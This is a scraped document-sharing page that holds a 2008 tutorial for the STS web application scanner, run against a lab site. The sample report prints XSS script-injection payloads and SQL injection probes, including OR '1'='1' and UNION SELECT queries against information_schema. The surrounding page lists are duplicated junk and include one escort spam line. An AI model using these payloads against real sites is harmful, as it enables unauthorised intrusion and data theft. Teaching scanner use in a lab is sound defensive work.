Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guide
 
HP WebInspect
HP WebInspectHP WebInspect
HP WebInspect
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
 
Computer security
Computer securityComputer security
Computer security
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
website vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperwebsite vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paper
 
POC-Netsparker
POC-NetsparkerPOC-Netsparker
POC-Netsparker
 
SPI Dynamics web application security 101
SPI Dynamics web application security 101 SPI Dynamics web application security 101
SPI Dynamics web application security 101
 
15minutesintroductiontoappdynamics1.pdf
15minutesintroductiontoappdynamics1.pdf15minutesintroductiontoappdynamics1.pdf
15minutesintroductiontoappdynamics1.pdf
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Iu report
Iu reportIu report
Iu report
 
Advanced security - Seccom Global
Advanced security - Seccom Global Advanced security - Seccom Global
Advanced security - Seccom Global
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Web application finger printing - whitepaper
Web application finger printing - whitepaperWeb application finger printing - whitepaper
Web application finger printing - whitepaper
 
AppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security AgileAppSec California 2016 - Making Security Agile
AppSec California 2016 - Making Security Agile
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
Web Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and PreventionWeb Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and Prevention
 
Securing web applications
Securing web applicationsSecuring web applications
Securing web applications
 
2016 Guide to User Data Security
2016 Guide to User Data Security2016 Guide to User Data Security
2016 Guide to User Data Security
 
B&W Netsparker overview
B&W Netsparker overviewB&W Netsparker overview
B&W Netsparker overview
 

Mehr von tutorialsruby

&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>tutorialsruby
 
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>tutorialsruby
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0tutorialsruby
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269tutorialsruby
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269tutorialsruby
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008tutorialsruby
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008tutorialsruby
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheetstutorialsruby
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheetstutorialsruby
 

Mehr von tutorialsruby (20)

&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
 
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
xhtml-documentation
xhtml-documentationxhtml-documentation
xhtml-documentation
 
xhtml-documentation
xhtml-documentationxhtml-documentation
xhtml-documentation
 
CSS
CSSCSS
CSS
 
CSS
CSSCSS
CSS
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
 
HowTo_CSS
HowTo_CSSHowTo_CSS
HowTo_CSS
 
HowTo_CSS
HowTo_CSSHowTo_CSS
HowTo_CSS
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheets
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheets
 

Kürzlich hochgeladen

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 

Kürzlich hochgeladen (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 

sts-scanner_tutorial

  • 1. STS Scanner Tutorial By Jordan Del-Grande Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 1 of 13
  • 2. Table of Contents STS Scanner Tutorial.....................................................................................................1 Preamble...................................................................................................................3 Introduction..............................................................................................................3 Installation................................................................................................................3 The Assessment........................................................................................................4 Reconnaissance ....................................................................................................4 Enumeration..........................................................................................................7 Testing..................................................................................................................7 Reviewing the Results...........................................................................................8 Future Improvements................................................................................................9 Appendix A: STS-Scanner Report...............................................................................10 Company Details..........................................................................................................13 About the Author....................................................................................................13 Contact Information................................................................................................13 Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 2 of 13
  • 3. Preamble This paper is an how-to on the correct usage of the STS Scanner. The tool is freely available for download at http://www.securitytechscience.com/resources/. The information is made available to educate testers on how to discover these vulnerabilities and developers on how to prevent writing applications that contain these types of vulnerabilities. All techniques in this paper were performed within the confines of the Security Technology Science Testing Lab. Only test on applications that are either under your direct ownership or you have written legal authorisation to test. Introduction The STS Scanner is specifically a web application scanner. It is not designed to replace the penetration tester or the penetration test. It is a tool that should assist the penetration tester in performing a vulnerability assessment/penetration test and hence is only one step of many in the process. With that said, the paper is organised in much the same fashion as the high level steps in a penetration test. It should not be mistaken that this is the be all and end all of the penetration test. The other sections of a penetration test have been excluded in order to focus primarily on how to use the STS Scanner. For a comprehensive guide on performing a penetration test see OWASP http://www.owasp.org/index.php/Category:OWASP_Testing_Project. Installation Step 1: Install Ruby The STS Scanner has been completely written using the Ruby programming language. Information on how to download and install Ruby can be found at http://www.ruby- lang.org/en/downloads/. Step 2: Install RubyGems Note: For those using windows, you can skip this step if you used the Ruby One Click Installer. There is one RubyGems library which is needed and as such RubyGems is necessary. Information on how to download and install RubyGems can be found here http://rubygems.org/. Step 3: Install Hpricot Hpricot is a RubyGems library used for parsing html pages. Run the following from the command line as a privileged user... gem install hpricot ­­remote   Step 4: Run STS Scanner To test that the installation was a success, run the STS Scanner from the command line. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 3 of 13
  • 4. Step 5: Check out the STS Scanner Options Run ruby sts-scanner.rb –help The Assessment Now that some background contextual information has been provided and you have installed the necessary components, let's begin by performing a web application scan on the Security Technology Science vulnerable web application, “OnlineBusiness”. There will in fact be 3 separate scans run in order to ensure that the majority of the applications attack surface area is completely discovered. The scans can be categorised as follows... 1. Reconnaissance Scan (Blind Scan) – Spider the site then scan 2. Unauthenticated Scan – Manually crawl the site then scan 3. Authenticated Scan – Manually crawl the site as an authenticated user then scan Reconnaissance As this is a black box assessment the only information provided to us is the URL of the application to be tested: http://onlinebusiness.com.au/. Browsing to the site we see the following page Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 4 of 13
  • 5. Figure 1.0 – OnlineBusiness Home Page At present we have gathered enough information to perform a reconnaissance/blind scan. We have the URL and we can see that the application runs over http on port 80. We can kick off the sts-scanner to firstly spider the application and then perform the appropriate tests by running the following command.... ruby sts­scanner.rb http://onlinebusiness.com.au Starting the Web Crawler... . . Web Crawler Complete! Starting Application Scan => http://onlinebusiness.com.au h .. ALERT: Directory Listing Detected => GET /images/ ..... ALERT: Cross­Site Scripting Vulnerability Detected in Repsonse Body  => GET /contacts.php ..................... Application Scan Complete!  Compiling results...Done! Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 5 of 13
  • 6. We will continue on with the reconnaissance to ensure that the majority of the applications attack surface area is completely recognised. After all, there are certain pages that the spider cannot yet recognise, such as certain JavaScript and Ajax code. As such, we will launch Burp Suite and begin manually crawling the application logging all requests to a local file. Firstly, configure your browser to proxy all request locally over port 8080. Figure 1.1 – Set up proxy Next, configure Burp Proxy to log all requests to a local file ‘onlinebusiness.burp’. Figure 1.2 – Logging all requests locally Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 6 of 13
  • 7. Finally, test that a request is passed through the Burp Proxy and begin the crawl of the entire application. Figure 1.3 – Burp Proxy Request Enumeration After crawling the website, we notice there is a ‘Login’ page, so we can assume there is a section of this application that requires authentication and the appropriate levels of authorisation to be viewed. Leveraging the “Application Username Enumeration” Whitepaper techniques found here http://www.securitytechscience.com/resources/, we discover a user name of ‘10006’ and password of ‘password’ with the application using cookies to track user sessions. We now use these credentials to log into the application, we create a new Burp Log file called ‘onlinebusiness-authenticated.burp’ and perform the crawl again. Note: We are careful not to click on any logout or change password links. Testing We can now begin the unauthorised scan of the application. It’s a simple matter of providing the sts-scanner with the burp file location... ruby sts­scanner.rb ­­log onlinebusiness.burp http://onlinebusiness.com.au  Next we need to perform the authorised scan of the application. As we now know the application uses cookies to track user sessions, we need to use Burp Proxy in order to view the session cookie. Log into the application and then make sure the ‘intercept is on’ button is enabled within Burp Proxy. Click on any link or perform a refresh of the current page and look for the session cookie. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 7 of 13
  • 8. Figure 1.4 – Session Cookie Using the session cookie identified and still remaining logged into the application, we can now perform the authorised scan... ruby sts­scanner.rb ­­log onlinebusiness­authenticated.burp ­­cookie     “sessionid=123456” http://onlinebusiness.com.au Reviewing the Results After every scan is complete, the sts-scanner produces several different files. They are... 1. spider.log – log of all the spiders requests and responses 2. scanner.log – log of all the scanners requests and responses 3. date-time-host.txt – text file of the attack surface area and the vulnerabilities discovered Note: For the sake of brevity we are only going to focus on the last file. The complete file is located in Appendix A. Section 1: Target This section contains the target host the scanner tested. That is, http://onlinebusiness.com.au ** STS Web Application Scanner ** Target => http://onlinebusiness.com.au Section 2: Crawl This section contains the surface area the spider was able to identify. ** Crawling Target Site ** GET / GET /images/glasses.jpg Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 8 of 13
  • 9. GET /images/english.gif GET /contacts.php POST /contacts.php?postcode= ... Section 3: Vulnerabilities This section contains the identified vulnerabilities from the scan. Going from top to bottom there is a directory listing identified, two cross site scripting holes and one definite sql injection where the scanner identified the DBMS as MySQL and that there are 5 varchars columns in the table. ** Starting Application Scan ** ALERT: Directory Listing Detected => GET /images/ ALERT: Cross­Site Scripting Vulnerability Detected in Response Body =>  GET /contacts.php user­agent: "><script>alert('Vulnerable');</script> ALERT: Cross­Site Scripting Vulnerability Detected in Response Body =>  POST /contacts.php?postcode="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /contacts.php? postcode=te'st ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR %20'1'%3D'1'­­ ALERT: Enumerated column number blind: 5 => POST /contacts.php? postcode=1%20ORDER%20BY%206­­ ALERT: Verified database type blind: mysql => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM %20information_schema.TABLES­­ ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION %20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES­­ ... Future Improvements The STS Scanner uses Mechanize and Hpricot to parse and spider html pages. These libraries are not able to parse and idenitify JavaScript and/or Ajax code. A separate version of the STS Scanner is to be developed where the internal core does not rely on these libraries and they shall become obsolete. The core shall act more like an everyday browser (i.e., IE, Firefox, etc) so it can hopefully branch out into other applications such as Flash and web services. The testing modules are currently limited to performing only 3 types of tests (i.e., sql injection, xss injection, directory indexing). These are to be expanded to incorporate mores injection tests such as CSRF, code execution, HTTP response splitting, etc. The reporting functionality is to be updated to produce pdf files containing clickable links, statistics and graphs. Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 9 of 13
  • 10. Appendix A: STS-Scanner Report ** STS Web Application Scanner ** Target => http://onlinebusiness.com.au ** Crawling Target Site ** GET / GET /images/glasses.jpg GET /images/english.gif GET /images/french.gif GET /images/russian.gif GET /contacts.php POST /contacts.php?postcode= GET /database/contacts.txt GET /login.php POST /login.php?login=&password= GET /login.php?msg='Username%20does%20not%20exist' POST /login.php?login=&password= GET /logininformation.php GET /products.php POST /products.php?name=&description=&type=Stock GET /index.php ** Crawling Complete ** ** Starting Application Scan ** ALERT: Directory Listing Detected => GET /images/ ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php user-agent: "><script>alert('Vulnerable');</script> ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /contacts.php? postcode=te'st ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR %20'1'%3D'1'-- ALERT: Enumerated column number blind: 5 => POST /contacts.php? postcode=1%20ORDER%20BY%206-- Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 10 of 13
  • 11. ALERT: Verified database type blind: mysql => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM %20information_schema.TABLES-- ALERT: Enumerated data types blind => POST /contacts.php? postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM %20information_schema.TABLES-- ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode= user-agent: "><script>alert('Vulnerable');</script> ALERT: Directory Listing Detected => GET /database/ ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /login.php?msg="><script>alert('Vulnerable');</script> ALERT: MySQL Database Error Message Detected => POST /products.php? name=te'st&description=&type=Stock ALERT: Possible SQL Injection Exploit => POST /products.php?name=1'%20OR %20'1'%3D'1&description=&type=Stock ALERT: Verified Database Type: mysql => POST /products.php? name=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where %20'1'%3D'1&description=&type=Stock ALERT: Column Enumeration Successful: 3 => POST /products.php? name=1'%20UNION%20ALL%20select%20null,null,null%20from %20information_schema.TABLES%20where %20'1'%3D'1&description=&type=Stock ALERT: Enumerated data types => POST /products.php?name=1'%20UNION %20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES %20where%20'1'%3D'1&description=&type=Stock ALERT: MySQL Database Error Message Detected => POST /products.php? name=&description=te'st&type=Stock ALERT: Possible SQL Injection Exploit => POST /products.php? name=&description=1'%20OR%20'1'%3D'1&type=Stock ALERT: Verified Database Type: mysql => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH %20where%20'1'%3D'1&type=Stock ALERT: Column Enumeration Successful: 3 => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20null,null,null%20from %20information_schema.TABLES%20where%20'1'%3D'1&type=Stock Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 11 of 13
  • 12. ALERT: Enumerated data types => POST /products.php? name=&description=1'%20UNION%20ALL%20select%20'b','b','b'%20from %20information_schema.TABLES%20where%20'1'%3D'1&type=Stock ** Scan Finished ** ** Attack Surfaces ** == Parameter Attack Surface == = HTTP Client Header = cookie referer user-agent = GET/POST Parameter = GET /login.php+msg POST /contacts.php+postcode POST /login.php+login+password POST /products.php+name+description+type == Directory Attack Surface == GET / GET /database/ GET /images/ == File Attack Surface == GET /contacts.php GET /database/contacts.txt GET /index.php GET /login.php GET /logininformation.php GET /products.php ** End of Attack Surface ** Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 12 of 13
  • 13. Company Details About the Author Jordan Del-Grande, Director and Principal Consultant at Security Technology Science, has several years of successful management and consulting experience performing Information Security and Risk Management services in predominantly financial organisations. Prior to Security Technology Science, he spent several years as a consultant with Ernst & Young and the Advanced Security Center. Contact Information Company Name: Security Technology Science Pty Ltd Email: info@securitytechscience.com Web Site: www.securitytechscience.com Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 13 of 13